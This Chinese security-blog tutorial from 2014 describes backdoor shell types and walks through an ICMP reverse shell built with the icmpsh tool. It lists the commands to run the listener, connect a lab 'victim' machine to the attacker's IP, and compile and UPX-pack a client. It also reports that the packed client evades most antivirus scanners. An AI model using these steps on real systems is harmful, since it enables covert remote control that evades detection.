安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > 剑走偏锋:细数Shell那些事

剑走偏锋:细数Shell那些事

时间:2014-12-01来源: 作者:xia0k点击:
说到Shell,我想大家恐怕都不会太陌生。不仅如此,我想大家应该有不少自己的珍藏吧(有珍藏的可以私信我,咱们私聊:P)按平台分类的话,基本上大体可以分为两大类:针对web级别的和针对系统级别的。针对web的大体…

说到Shell,我想大家恐怕都不会太陌生。不仅如此,我想大家应该有不少自己的珍藏吧(有珍藏的可以私信我,咱们私聊:P)
//ANYUN.ORG

按平台分类的话,基本上大体可以分为两大类:针对web级别的和针对系统级别的。针对web的大体根据语言不同又分为PHP、JSP、ASP等(这让我不由得想起了那些年,大牛们写过的各种后门……),针对系统级别的一般分为:windows后门和基于unix的后门,不过到现在为止我并没有见过apple后门,大概,是因为我穷吧。 //安云网,anyun.org

言归正传,今天我要跟大家聊的东西,是针对系统的Shell后门。烦请大牛不要喷我,觉得文章水的可以直接略过不谈。

//本文来自安云网

0×01我先分个类 //ANYUN.ORG

这里我按照协议不同来分类。 //安云网,anyun.org

首先,是基于TCPUDP协议的shell //copyright AnYun.ORG

这类shell已经遍地都是,而且功能也越来越强大,因为基于这两种协议的木马通信能力更强。当然树大易招风,关于这类shell后门也越来越多的受到安全厂商的关注,造成的结果是这类木马一般都是产业级的进行免杀操作,使用之后被杀毒软件截获便失去效用,需要重新做免杀。而这玩意儿略贵。所以一般的个人想玩玩又不懂免杀的根本玩不起。

//内容来自安云网

其次,是基于ICMP协议的shell

//copyright AnYun.ORG

我们都知道,通信协议无外乎TCPUDPICMP了,既然前两种玩不起我们就来看看ICMP怎么样。 //内容来自安云网

既然是通信协议嘛,肯定是可以发送数据的,那么我们来看看一个PING究竟发送了什么数据:

//copyright AnYun.ORG

//本文来自安云网

//ANYUN.ORG

从图上就可以清晰看出来了。第一张是windowsping的时候发送的数据,第二张图是linux的ping的时候发送的数据,还是有点差距的,嗯。 //内容来自安云网

通过以上证据就可以证明ICMP协议通信是可以带着我们想要的数据飞的,最起码理论上是可行的。

//本文来自安云网

然后,是基于DNS解析的shell

//copyright AnYun.ORG

除去三种协议以外,还有一种是基于DNS解析的后门shell。之前我记得有人发过一种剑(wei)走(suo)偏(zhi)锋(ji)的CMCC(或者Chinanet)的不登陆的上网方式,用的就是DNS;之前还有一个木马就是用这种方式来传数据的,那场面,更加猥琐,简直不忍直视。。

//copyright AnYun.ORG

这里DNS解析后门自然是有好处的,就是极不容易被察觉,但是自然也有缺点,那就是数据走得慢。这个慢,不是一般的慢,总的说来,你要是想用高级功能比如桌面控制,呵呵,基本不可能,而且实施起来也略微复杂。所以这次我们暂且不讲,以后再讨论。 //copyright AnYun.ORG

按照协议分完了,我们再按照连接方式分一下 //内容来自安云网

按照连接方式,分为主动连接和被动连接,主动连接是BindShell,被动连接是ReverseShell,这个我想大家也应该很熟悉了。这里上几张图简要做一下解释(图片来源于网络)

//ANYUN.ORG

//copyright AnYun.ORG

由攻击机主动连接受害主机,这种我们叫做BindShell,缺点是易被拦截易掉线。 //本文来自安云网

//本文来自安云网

由被攻击主机主动连接攻击机器,这种我们叫做ReverseShell,是目前主流的Shell使用的类型,缺点是需要攻击机器有固定的公网IP,优点是不用担心目标机器的动态IP导致掉线问题。

//内容来自安云网

但是,不管是BindShell还是ReverseShell,因为基于TCP或者UDP,防火墙很敏感,容易被防火墙拦截,即便是我们的后门已经经过了杀软的考验,可能也会在这一轮中折掉,导致我们的后门安插失败。

//内容来自AnYun.ORG

//安云网,anyun.org

今天我们要跟大家分享的是:ICMPReverseShell

//ANYUN.ORG

0×02测试平台简介

//内容来自安云网

首先,我们得挑一个ICMP的通信Shell,当然自己写也是可以的。平台的原理是其实还是通信,利用ICMP通信协议,将我们想要执行的shell命令通过服务端传给客户端,然后客户端将执行之后得到的数据通过ICMP包传回来,服务端负责接收然后回显。 //安云网,anyun.org

这里我们挑取git的一个ICMPShell项目进行实际操作。 //安云网,anyun.org

先把项目取回本地

//安云网咨询系统

git clone https://github.com/inquisb/icmpsh.git /opt/icmp_reverse_shell //安云网,anyun.org

拿下来之后,我们可以看到这里面的文件了。这里面所有的东西都是开源的,方便我们看详细原理。其实文件中主要起作用的主要是两个文件,icmpsh_m.py和icmpsh.exe,其中icmpsh_m.py是服务端需要执行的python脚本,icmpsh.exe是客户端需要执行的脚本。还有一个icmpsh-s.c的slave客户端的源代码文件,有兴趣的同学可以看一下。除此之外,还有一个run.sh的BASH文件,文件内容大家可以自己看,主要就是如果你忘了配置什么东西他会事先配置好,最终起作用的还是icmpsh_m.py,所以最后服务端我们就用run.sh就好了
//安云网咨询系统

0×03演练
//copyright AnYun.ORG

说了这么多,下面我们开始玩真的。 //安云网,anyun.org

先说服务端:

//内容来自AnYun.ORG

运行run.sh //安云网,anyun.org

./run.sh

//内容来自安云网

然后我们根据提示输入IP,这里IP应该是公网IP,但是这里使用的是内网,所以我们输入C段IP,然后回车,我们就可以看到这样的提示:

//本文来自安云网

//copyright AnYun.ORG

这样服务端就配置好了,正在监听状态。 //内容来自安云网

下面是客户端:

//安云网咨询系统

我们打开靶机的cmd,输入命令:

//copyright AnYun.ORG

icmpsh.exe -t 192.168.246.129 -d 500 -b 30 -s 128 //copyright AnYun.ORG

//copyright AnYun.ORG

攻击机这边就成功拿到shell了

//copyright AnYun.ORG

//copyright AnYun.ORG

到这里,基本上想做什么就没问题了。 //内容来自AnYun.ORG

Shell中执行的命令已经被执行,但是靶机完全没反应

//本文来自安云网

//内容来自安云网

下面是玩耍时间,这个时候靶机ping一下攻击机,就发现攻击机收到了靶机的ping的聊骚内容,居然还有“hi”,掩面///… //ANYUN.ORG

//copyright AnYun.ORG

使用wireshark截个包看一下,嗯,数据全出来了,好赤果果 //ANYUN.ORG

//安云网,anyun.org

实操就这样。

//安云网咨询系统

0×04关于Shell客户端
//内容来自安云网

首先一个问题是Shell客户端的运行平台问题,很明显,客户端是只针对于windows平台的,Server是跨平台的。

//本文来自安云网

然后就是客户端的来源,当然大家可以使用作者在git上面给出的exe,也可以自己检查源代码文件然后自行编译加壳,编译的过程如下(这里只说linux的编译过程): //内容来自AnYun.ORG

首先安装mingw,这是编译的关键

//安云网,anyun.org

sudo apt-get update sudo apt-get install gcc-mingw32 //copyright AnYun.ORG

过程中计算机会将其余附加包一起装好我们就不操心了。

//本文来自安云网

安装好之后就是编译

//ANYUN.ORG

i686-w64-mingw32-gcc icmpsh-s.c -o icmp-slave.exe //安云网,anyun.org
//安云网,anyun.org

然后我们可以用upx加个壳

//ANYUN.ORG

upx -v icmp-slave.exe -o icmp-slave-upx.exe //安云网,anyun.org
//内容来自安云网

这样一个客户端就成型了,我们可以看出来压缩率大约在56%左右,压缩完之后大小56K左右。 //内容来自安云网

其实除了以上问题之外,我想大家最关心的就应该是杀软对Shell的反应了吧。细心的小伙伴应该发现了,在上面的图里,我的靶机是全程运行着360进行的实验(不是刻意为之,是之前做测试的时候靶机就装上了,这次没关),其实不只是360,到目前写本文章之前,绝大部分杀软都没有报毒。当然,这里我说的是我自己生成的客户端,至于git上自带的客户端,国内杀毒软件还是基本上都检测出来了。 //内容来自安云网

可是我可怜的小a啊。。 //内容来自安云网

//安云网咨询系统

至于更全面的测试,我这里贴上virustotal.com的结果:

//安云网咨询系统

首先是关于git上自带的客户端,我们发现大多数国内厂商都报毒了,看到这里我表示很欣慰。:) //内容来自AnYun.ORG

//本文来自安云网

然后我再拿我自己生成的加过壳的exe看一下,咦这是什么情况。。。

//ANYUN.ORG

//本文来自安云网

然后我们再看看刚编译出来热乎的,好像就更奇怪了。。 //内容来自安云网

//内容来自AnYun.ORG

看来是杀毒软件对upx现在是越来越敏感了,加个壳都不饶过。至于其他的奇怪现象。。。咦?飞碟! //copyright AnYun.ORG

0×05后记 //内容来自AnYun.ORG

写到这里,ICMP反向Shell介绍也就告一段落了,东西确实不是新东西,技术也没有多复杂,不过重点在于思路,在于以此为基础实现的更多更好(wei)玩(suo)的玩法。这次的交流就到这里,有更多更好的更猥琐的玩法的同学,欢迎聊骚私信。:P //安云网,anyun.org

期待更多的关于技术的交流,我是小花,我喂自己袋盐。 //copyright AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容